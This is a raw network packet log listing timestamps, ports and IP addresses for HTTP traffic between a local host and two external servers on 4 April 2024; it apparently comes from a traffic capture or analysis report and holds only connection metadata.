Apr 4, 2024 17:49:05.745218992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.745280981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745342970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745420933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.745429993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745534897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745579958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.745646000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745685101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745738983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.745763063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745827913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745894909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.745901108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745960951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746040106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746083975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.746125937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746162891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.746253014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746294975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746308088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746340990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.746376038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746465921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746467113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.746556044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746603012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.746614933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746702909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746747971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.746773005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746833086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746906042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.746979952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747003078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747117996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747150898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747159004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747189999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747219086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747289896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747351885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747389078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747425079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747469902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747473955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747545004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747559071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747587919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747657061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747673035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747720957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747745991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747786999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747828960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747889042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747932911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.747937918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747983932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.747997046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748035908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748054028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748102903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748115063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748140097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748150110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748198032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748289108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748322964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748369932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748388052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748444080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748481989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748482943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748567104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748579979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748610020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748621941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748639107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748744965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748785019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748788118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748809099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748852968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.748867035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748913050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.748972893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749037027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749067068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749067068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749146938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749222040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749274969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749288082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749382973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749420881 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749444008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749506950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749573946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749622107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749669075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749716043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749728918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749775887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749813080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749814034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749864101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749902964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.749922037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.749994993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.750047922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.750057936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.750082970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.750097036 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750119925 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.750148058 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750176907 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750216961 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750221014 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750288963 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750309944 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750382900 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750416040 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750457048 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750463963 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750502110 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750538111 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750550985 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750591040 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750638962 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750665903 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750693083 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750700951 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750711918 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750736952 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750756979 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750772953 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750803947 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750827074 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750843048 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750874996 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750879049 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750889063 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.750920057 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.750946999 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751039028 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751050949 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751096010 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751096010 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751120090 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751144886 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751183987 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751190901 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751190901 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751226902 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751246929 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751285076 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751296997 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751338959 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751346111 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751414061 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751447916 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751460075 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751491070 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751513004 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751524925 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751542091 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751588106 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751605988 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751665115 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751696110 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751708984 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751737118 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751746893 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751756907 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751821041 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751856089 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751866102 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751897097 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.751920938 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751934052 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.751971960 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752022982 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752077103 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752084017 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752118111 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752166986 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752178907 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752226114 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752252102 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752264023 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752295971 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752315044 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752370119 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752509117 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752548933 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752629995 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752669096 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752697945 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752739906 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752743959 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752779007 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752810955 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752825022 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752867937 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752895117 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752924919 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.752934933 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.752975941 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.753010988 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.753101110 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.753139973 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.753154993 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.753197908 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.753220081 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.753256083 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.753340006 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.753372908 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.753380060 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.753412008 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.802201033 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.802253008 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.802417040 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.802431107 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.802475929 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.810587883 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.810645103 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.810709000 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.810723066 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.810751915 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.810770035 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811372995 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811431885 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811619997 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811638117 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811683893 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811750889 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811789989 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811865091 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811877012 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811908960 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811919928 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811923027 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811935902 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811958075 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811975956 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.811980009 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.811990976 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812012911 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812032938 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812047958 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812058926 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812061071 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812088966 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812093019 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812128067 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812144041 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812160015 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812174082 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812186956 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812189102 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812208891 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812212944 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812227011 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812244892 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812258959 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812284946 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812364101 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812402964 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812485933 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812500000 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812544107 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812572956 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812609911 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812699080 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812711954 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812737942 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812756062 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.812880039 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812905073 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.812947035 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813112020 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813158989 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813216925 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813230991 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813267946 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813319921 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813355923 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813378096 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813421011 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813482046 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813565969 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813606024 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813764095 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813777924 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813817024 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813891888 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813905001 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.813941956 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.813977003 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814007998 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814017057 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814048052 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814049006 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814089060 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814232111 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814274073 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814315081 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814353943 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814361095 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814388990 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814522028 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814591885 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814625025 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814661026 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814721107 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814831018 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814874887 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814891100 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814927101 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.814946890 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.814985991 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815141916 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815155029 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815193892 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815227032 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815238953 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815263987 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815284014 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.815340042 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815351963 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.815388918 CEST	49731	80	192.168.2.10	190.249.187.165
